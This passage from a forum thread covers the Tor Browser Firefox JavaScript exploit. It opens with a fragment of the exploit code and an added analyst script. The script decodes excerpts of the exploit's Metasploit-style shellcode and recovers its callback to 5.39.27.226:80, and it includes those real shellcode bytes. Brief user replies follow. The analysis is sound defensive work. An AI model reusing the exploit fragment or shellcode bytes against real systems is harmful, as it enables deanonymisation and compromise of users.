    spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);
    postMessage("GREAT SUCCESS");
    };
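
    Two of the findings above, the callback to 5.39.27.226 and the resemblance to known shellcode, can be reproduced from `thecode` itself. The following is an added example, not code from the tor-talk post or the Wordfence bulletin. It reverses the packing cssbanner.js applies (two UTF-16 code units per dword, so each code unit becomes two little-endian bytes), checks for the Metasploit block_api prologue, extracts ASCII strings, and looks for the `push imm32; push imm16` pair that Metasploit-style reverse stagers use to build a sockaddr_in. The three string constants are excerpts of the shellcode posted above (prologue, connect set-up, HTTP template) concatenated into one constructed sample; `scanPageSource` and the tiny sample page are constructed too, for the watering-hole case where a page pulled from a suspected site has to be triaged.

```javascript
// Added example; not code from the tor-talk post or the Wordfence bulletin.
// cssbanner.js packs `thecode` two UTF-16 code units per dword
// (charCodeAt(j) + 65536 * charCodeAt(j + 1)), so each code unit lands in
// memory as two little-endian bytes. Undo that, then pull out what an analyst
// wants from an unknown blob: the Metasploit block_api prologue, ASCII
// strings, and the push pair Metasploit-style stagers use for sockaddr_in.

// Excerpts of the shellcode posted above (prologue, connect set-up, HTTP
// request template), concatenated into one constructed sample. The real blob
// is ~1.2 KB; these are the regions the findings depend on.
const PROLOGUE_EXCERPT = '\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30';
const SOCKADDR_EXCERPT = '\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u8951\u6ae2\u5210\u6853\ua599\u6174\ud5ff';
const HTTP_EXCERPT = '\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a67\u6720\u697a\u0d70\u0d0a\u000a\u0a0d' +
  '\u6f43\u6b6f\u6569\u203a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u4700' +
  '\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u3132\u2032\u5448\u5054\u312f\u312e\u0a0d' +
  '\u6f48\u7473\u203a\u0000\u4190';
const SAMPLE_CODE = PROLOGUE_EXCERPT + SOCKADDR_EXCERPT + HTTP_EXCERPT;

// cld; call $+0x89; pushad; mov ebp,esp; xor edx,edx; mov edx,fs:[edx+0x30]:
// the block_api prologue (start of the PEB walk) every msf x86 stager begins with.
const BLOCK_API_PROLOGUE = [0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30];

// Reverse the worker's packing: one UTF-16 code unit -> two little-endian bytes.
function codeUnitsToBytes(s) {
  if (s.length % 2) s += '\u9090';          // cssbanner.js pads odd lengths with two NOPs
  const out = new Uint8Array(s.length * 2);
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    out[2 * i] = c & 0xff;
    out[2 * i + 1] = c >>> 8;
  }
  return out;
}

function startsWith(bytes, pattern) {
  return pattern.every((b, i) => bytes[i] === b);
}

// Runs of printable ASCII of at least `min` chars; CR, LF and NUL end a run.
function asciiStrings(bytes, min = 5) {
  const found = [];
  let run = '';
  for (const b of bytes) {
    if (b >= 0x20 && b <= 0x7e) { run += String.fromCharCode(b); continue; }
    if (run.length >= min) found.push(run);
    run = '';
  }
  if (run.length >= min) found.push(run);
  return found;
}

// `68 A B C D 66 68 P Q`: push imm32 holding the IPv4 address, then push imm16
// holding the port, both already in network byte order. That is how msf
// reverse_* stagers lay out sockaddr_in on the stack before calling connect().
function sockaddrCandidates(bytes) {
  const hits = [];
  for (let i = 0; i + 8 < bytes.length; i++) {
    if (bytes[i] === 0x68 && bytes[i + 5] === 0x66 && bytes[i + 6] === 0x68) {
      hits.push({
        offset: i,
        ip: Array.from(bytes.subarray(i + 1, i + 5)).join('.'),
        port: (bytes[i + 7] << 8) | bytes[i + 8],
      });
    }
  }
  return hits;
}

function triage(code) {
  const bytes = codeUnitsToBytes(code);
  return {
    bytes: bytes.length,
    metasploitPrologue: startsWith(bytes, BLOCK_API_PROLOGUE),
    strings: asciiStrings(bytes),
    sockaddr: sockaddrCandidates(bytes),
  };
}

// Watering-hole triage: pull every long run of \uXXXX escapes out of a page's
// source (the shape `thecode` has above, with or without the "' + '" split)
// and triage each run on its own.
const ESCAPE_RUN = /(?:\\u[0-9a-fA-F]{4}){16,}/g;
function scanPageSource(src) {
  return (src.match(ESCAPE_RUN) || []).map(run =>
    triage(run.replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))));
}

// Constructed sample page: the sample blob written back out as a source literal.
function toSourceLiteral(s) {
  let lit = "'";
  for (let i = 0; i < s.length; i++) lit += '\\u' + s.charCodeAt(i).toString(16).padStart(4, '0');
  return lit + "'";
}
const SAMPLE_PAGE = '<script>var thecode=' + toSourceLiteral(SAMPLE_CODE) + ';</script>';

if (typeof module !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triage(SAMPLE_CODE), null, 2));
  console.log(scanPageSource(SAMPLE_PAGE).map(r => r.sockaddr));
}
```

    Run with `node`: the sample triages to prologue present, `sockaddr` = 5.39.27.226:80 (the push of 0xe21b2705 followed by a push of 0x0050), and the strings `Accept-Encoding: gzip`, `Cookie: MC=ws2_32`, `IPHLPAPI`, `GET /0a821a80/05dc0212 HTTP/1.1` and `Host: `, which is the reverse-HTTP stager shape the bulletin describes. The `push`/`push` pattern is a heuristic for hand-written and msf-style stagers only; shellcode that builds its sockaddr with `mov` or from a string will not match it, so treat a miss as "not this family" rather than "benign".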

  2. #2
    Registered since
    13.06.2016
    Posts
    1,199
    Blog entries
    2



    Re: Firefox security vulnerability Tor browser bundle Javascript exploit

    only theoretical or of practical relevance
    https://de.wikipedia.org/wiki/Dodona

  3. #3



    Re: Firefox security vulnerability Tor browser bundle Javascript exploit

    The problem itself is Windoof.
    Everyone believes they have an opinion of their own, they've just forgotten where they got it.
    The media are what was once said of religion: opium for the people.


  4. #4



    Re: Firefox security vulnerability Tor browser bundle Javascript exploit

    Windoof and Java in combination has always been a security hole. The average Windoof user usually doesn't care, especially since very few give any real thought to security when surfing the internet.
    "My fatherland has at all times the first claim on me." (Mozart)

    "I have only one fatherland, and that is Germany." (vom Stein)
